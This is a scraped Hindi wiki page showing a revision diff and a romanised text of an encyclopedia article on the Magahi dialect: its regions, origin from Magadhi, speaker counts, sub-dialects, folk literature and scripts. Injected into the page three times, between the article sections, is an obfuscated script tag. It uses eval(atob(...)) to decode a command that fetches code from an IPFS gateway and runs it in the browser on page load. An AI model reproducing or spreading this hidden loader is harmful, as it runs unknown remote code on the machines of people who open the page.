Difference between revisions of "मगही बोली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*मगही बोली [[पटना]], [[हज़ारीबाग़]], [[मुँगेर]], पालामऊ, [[भागलपुर]] और [[राँची]] आदि ज़िलों के कुछ भागों में बोली जाती है।  
+
*मगही बोली [[पटना]], [[हज़ारीबाग़]], [[मुँगेर]], पालामऊ, [[भागलपुर]] और [[राँची]] आदि ज़िलों के कुछ भागों में बोली जाती है।
 
+
*'मगही' शब्द 'मागधी' का विकसित रूप है।*कुछ पढ़े- लिखे लोग इसे 'मागधी' भी कहते हैं। 'मगही' या 'मागधी' का अर्थ है - '[[मगध]] की भाषा', पर आधुनिक 'मगही' प्राचीन मगध वर्तमान पटना ज़िला तथा गया का आधा भाग<ref>वर्तमान पटना ज़िला तथा गया का आधा भाग</ref> तक ही सीमित नहीं है।
*'मगही' शब्द 'मागधी' का विकसित रूप है।*कुछ पढ़े- लिखे लोग इसे 'मागधी' भी कहते हैं। 'मगही' या 'मागधी' का अर्थ है - '[[मगध]] की भाषा', पर आधुनिक 'मगही' प्राचीन मगध वर्तमान पटना ज़िला तथा गया का आधा भाग<ref>वर्तमान पटना ज़िला तथा गया का आधा भाग</ref> तक ही सीमित नहीं है।  
+
*'मगही' बोलने वालों की संख्या [[ग्रियर्सन]] के [[भाषा]] - सर्वेक्षण के अनुसार लगभग 6,504,817 थी। अब यह संख्या एक करोड़ के लगभग होगी।
 
+
*'मगही' का परिनिष्ठित रूप [[गया]] ज़िले में बोला जाता है।*अन्य स्थानों पर समीपवर्ती भाषाओं का प्रभाव पड़ा है। [[पटना]] की 'मगही' पर [[मैथिली भाषा|मैथिली]], [[भोजपुरी]]तथा पटना के [[उर्दू]] भाषी [[मुसलमान|मुसलमानों]] का प्रभाव है, अत: उधर के स्थानीय रूप '[[उड़िया भाषा|उड़िया]]' से, और इसी प्रकार पूर्वी स्थानीय रूप से [[बांग्ला भाषा|बंगाली]] से प्रभावित हैं।
*'मगही' बोलने वालों की संख्या [[ग्रियर्सन]] के [[भाषा]] - सर्वेक्षण के अनुसार लगभग 6,504,817 थी। अब यह संख्या एक करोड़ के लगभग होगी।  
+
*पश्चिमी सीमा की 'मगही' [[भोजपुरी भाषा|भोजपुरी]] से प्रभावित है। इन विभिन्न रूपों को मिश्रित मगही या यदि अलग- अलग कहना चाहें तो मैथिली- प्रभावित मगही, भोजपुरी- प्रभावित मगही आदि नाम दे सकते हैं। *'मगही' का एक प्रधान रूप है पूर्वी मगही। इसके अंतर्गत कई उपबोलियाँ हैं, जिनका आगे उल्लेख किया गया है।
 
 
*'मगही' का परिनिष्ठित रूप [[गया]] ज़िले में बोला जाता है।*अन्य स्थानों पर समीपवर्ती भाषाओं का प्रभाव पड़ा है। [[पटना]] की 'मगही' पर [[मैथिली भाषा|मैथिली]], [[भोजपुरी]]तथा पटना के [[उर्दू]] भाषी [[मुसलमान|मुसलमानों]] का प्रभाव है, अत: उधर के स्थानीय रूप '[[उड़िया भाषा|उड़िया]]' से, और इसी प्रकार पूर्वी स्थानीय रूप से [[बांग्ला भाषा|बंगाली]] से प्रभावित हैं।  
 
 
 
*पश्चिमी सीमा की 'मगही' [[भोजपुरी भाषा|भोजपुरी]] से प्रभावित है। इन विभिन्न रूपों को मिश्रित मगही या यदि अलग- अलग कहना चाहें तो मैथिली- प्रभावित मगही, भोजपुरी- प्रभावित मगही आदि नाम दे सकते हैं। *'मगही' का एक प्रधान रूप है पूर्वी मगही। इसके अंतर्गत कई उपबोलियाँ हैं, जिनका आगे उल्लेख किया गया है।  
 
 
 
 
*मगही में लिखित साहित्य नहीं है। लोक- साहित्य पर्याप्त है जिसमें 'गोपीचन्द' और 'लोरिक' प्रसिद्ध हैं। *इसकी लिपि प्रमुखत: कैथी तथा [[देवनागरी लिपि|नागरी]] है।
 
*मगही में लिखित साहित्य नहीं है। लोक- साहित्य पर्याप्त है जिसमें 'गोपीचन्द' और 'लोरिक' प्रसिद्ध हैं। *इसकी लिपि प्रमुखत: कैथी तथा [[देवनागरी लिपि|नागरी]] है।
 
*'पूर्वी मगही' को कुछ लोग बंगाली तथा उड़िया में भी लिखते हैं। अब नागरी का प्रचार बढ़ रहा है।
 
*'पूर्वी मगही' को कुछ लोग बंगाली तथा उड़िया में भी लिखते हैं। अब नागरी का प्रचार बढ़ रहा है।

Latest revision as of 12:56, 28 December 2011

  • magahi boli patana, hazaribag, muanger, palamoo, bhagalapur aur raanchi adi ziloan ke kuchh bhagoan mean boli jati hai.
  • 'magahi' shabd 'magadhi' ka vikasit roop hai.*kuchh padhe- likhe log ise 'magadhi' bhi kahate haian. 'magahi' ya 'magadhi' ka arth hai - 'magadh ki bhasha', par adhunik 'magahi' prachin magadh vartaman patana zila tatha gaya ka adha bhag[1] tak hi simit nahian hai.
  • 'magahi' bolane valoan ki sankhya griyarsan ke bhasha - sarvekshan ke anusar lagabhag 6,504,817 thi. ab yah sankhya ek karo d ke lagabhag hogi.
  • 'magahi' ka parinishthit roop gaya zile mean bola jata hai.*any sthanoan par samipavarti bhashaoan ka prabhav p da hai. patana ki 'magahi' par maithili, bhojapuritatha patana ke urdoo bhashi musalamanoan ka prabhav hai, at: udhar ke sthaniy roop 'u diya' se, aur isi prakar poorvi sthaniy roop se bangali se prabhavit haian.
  • pashchimi sima ki 'magahi' bhojapuri se prabhavit hai. in vibhinn roopoan ko mishrit magahi ya yadi alag- alag kahana chahean to maithili- prabhavit magahi, bhojapuri- prabhavit magahi adi nam de sakate haian. *'magahi' ka ek pradhan roop hai poorvi magahi. isake aantargat kee upaboliyaan haian, jinaka age ullekh kiya gaya hai.
  • magahi mean likhit sahity nahian hai. lok- sahity paryapt hai jisamean 'gopichand' aur 'lorik' prasiddh haian. *isaki lipi pramukhat: kaithi tatha nagari hai.
  • 'poorvi magahi' ko kuchh log bangali tatha u diya mean bhi likhate haian. ab nagari ka prachar badh raha hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani

  1. vartaman patana zila tatha gaya ka adha bhag

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>